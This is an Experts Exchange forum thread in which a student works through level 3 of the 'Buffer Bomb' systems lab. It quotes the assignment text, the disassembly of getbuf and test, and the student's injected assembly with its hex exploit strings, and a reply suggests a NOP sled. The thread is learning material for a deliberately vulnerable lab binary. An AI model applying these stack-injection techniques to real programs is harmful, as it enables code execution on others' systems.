teknician
asked on
Buffer Bomb Level 3 (Dynamite)
I know this lab has been discussed many times here, and I have searched through all that I can find but am still not finding what I am looking for. I am on the fourth phase of the Buffer Overflow Bomb and I am having some trouble. Here is the pertinent info:
Now, I have been trying a lot of things and recently I came up with a partial solution, but I need to know if I am on the right track. I am also having an issue with getting it to work properly. Without going through everything I have done so far, I will show where I am at currently.
I found that (based on the last level) I can write these instructions:
Which will effectively write my cookie to a place in memory (global). It then pushes the memory location of the next instruction in <test> just after <getbuf> is called, and returns to that function. So I can get it to jump to my exploit code and back to where I want.
My issue is that I have been trying to write to %eax but get a segmentation fault every time. I can write to memory but not to %eax. This is what I was trying:
I would appreciate any input I can get.
Thanks
1 void test()
2 {
3 int val;
4 volatile int local = 0xdeadbeef;
5
6 val = getbuf();
7
8 /* Check for corrupted stack */
9 if (local != 0xdeadbeef) {
10 printf("Sabotaged!: the stack has been corrupted\n");
11 }
12 else if (val == cookie) {
13 printf("Boom!: getbuf returned 0x%x\n", val);
14 validate(3);
15 } else {
16 printf("Dud: getbuf returned 0x%x\n", val);
17 }
18 }
Our preceding attacks have all caused the program to jump to the code for some other function, which
then causes the program to exit. As a result, it was acceptable to use exploit strings that corrupt the stack,
overwriting saved values.
The most sophisticated form of buffer overflow attack causes the program to execute some exploit code that
changes the program’s register/memory state, but makes the program return to the original calling function
(test in this case). The calling function is oblivious to the attack. This style of attack is tricky, though,
since you must: 1) get machine code onto the stack, 2) set the return pointer to the start of this code, and 3)
undo any corruptions made to the stack state.
Your job for this level is to supply an exploit string that will cause getbuf to return your cookie back to
test, rather than the value 1. You can see in the code for test that this will cause the program to go
“Boom!.” Your exploit code should set your cookie as the return value, restore any corrupted state, push
the correct return location on the stack, and execute a ret instruction to really return to test.
Some Advice:
• You can use GDB to get the information you need to construct your exploit string. Set a breakpoint
within getbuf and run to this breakpoint. Determine parameters such as the saved return address.
• Determining the byte encoding of instruction sequences by hand is tedious and prone to errors. You
can let tools do all of the work by writing an assembly code file containing the instructions and data
you want to put on the stack. Assemble this file with GCC and disassemble it with OBJDUMP. You
should be able to get the exact byte sequence that you will type at the prompt. (A brief example of
how to do this is included at the end of this writeup.)
• Keep in mind that your exploit string depends on your machine, your compiler, and even your userid’s
cookie. Do all of your work on the class server, and make sure you include the proper userid on the
command line to BUFBOMB.
Once you complete this level, pause to reflect on what you have accomplished. You caused a program to
execute machine code of your own design. You have done so in a sufficiently stealthy way that the program
did not realize that anything was amiss.
08048b93 <getbuf>:
8048b93: 55 push %ebp 0x55685ff0
8048b94: 89 e5 mov %esp,%ebp
8048b96: 83 ec 28 sub $0x28,%esp
8048b99: 8d 45 e0 lea 0xffffffe0(%ebp),%eax
8048b9c: 89 04 24 mov %eax,(%esp)
8048b9f: e8 3c ff ff ff call 8048ae0 <Gets>
8048ba4: b8 01 00 00 00 mov $0x1,%eax
8048ba9: c9 leave
8048baa: c3 ret
08048c0f <test>:
8048c0f: 55 push %ebp
8048c10: 89 e5 mov %esp,%ebp
8048c12: 83 ec 18 sub $0x18,%esp
8048c15: c7 45 fc ef be ad de movl $0xdeadbeef,0xfffffffc(%ebp)
8048c1c: e8 72 ff ff ff call 8048b93 <getbuf>
8048c21: 89 c2 mov %eax,%edx
8048c23: 8b 45 fc mov 0xfffffffc(%ebp),%eax
8048c26: 3d ef be ad de cmp $0xdeadbeef,%eax
8048c2b: 74 0e je 8048c3b <test+0x2c>
8048c2d: c7 04 24 a8 a0 04 08 movl $0x804a0a8,(%esp)
8048c34: e8 7b fc ff ff call 80488b4 <puts@plt>
8048c39: eb 36 jmp 8048c71 <test+0x62>
8048c3b: 3b 15 e0 c1 04 08 cmp 0x804c1e0,%edx
8048c41: 75 1e jne 8048c61 <test+0x52>
8048c43: 89 54 24 04 mov %edx,0x4(%esp)
8048c47: c7 04 24 2f a2 04 08 movl $0x804a22f,(%esp)
8048c4e: e8 f1 fb ff ff call 8048844 <printf@plt>
8048c53: c7 04 24 03 00 00 00 movl $0x3,(%esp)
8048c5a: e8 21 04 00 00 call 8049080 <validate>
8048c5f: eb 10 jmp 8048c71 <test+0x62>
8048c61: 89 54 24 04 mov %edx,0x4(%esp)
8048c65: c7 04 24 4c a2 04 08 movl $0x804a24c,(%esp)
8048c6c: e8 d3 fb ff ff call 8048844 <printf@plt>
8048c71: c9 leave
8048c72: c3 ret
Now, I have been trying a lot of things and recently I came up with a partial solution, but I need to know if I am on the right track. I am also having an issue with getting it to work properly. Without going through everything I have done so far, I will show where I am at currently.
I found that (based on the last level) I can write these instructions:
movl $0x583f74c2,0x804c1e8
pushl $0x08048c21
ret
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
c7 05 e8 c1 04 08 c2 74
3f 58 68 21 8c 04 08 c3
00 00 00 00 80 3e 68 55
Which will effectively write my cookie to a place in memory (global). It then pushes the memory location of the next instruction in <test> just after <getbuf> is called, and returns to that function. So I can get it to jump to my exploit code and back to where I want.
My issue is that I have been trying to write to %eax but get a segmentation fault every time. I can write to memory but not to %eax. This is what I was trying:
movl $0x583f74c2,%eax
pushl $0x08048c21
ret
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 b8 c2 74
3f 58 68 21 8c 04 08 c3
00 00 00 00 84 3e 68 55
I would appreciate any input I can get.
Thanks
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
I answered my own solution correctly but the other post helps to clarify how it works.
hey hii,
What is the Final assembly code that you used to exploit the string!.
Thanks
What is the Final assembly code that you used to exploit the string!.
Thanks
You can counter this by filling the buffer with NOP instructions (0x90) rather than 0x00's, or you can pass it the right address where the byte code actually starts.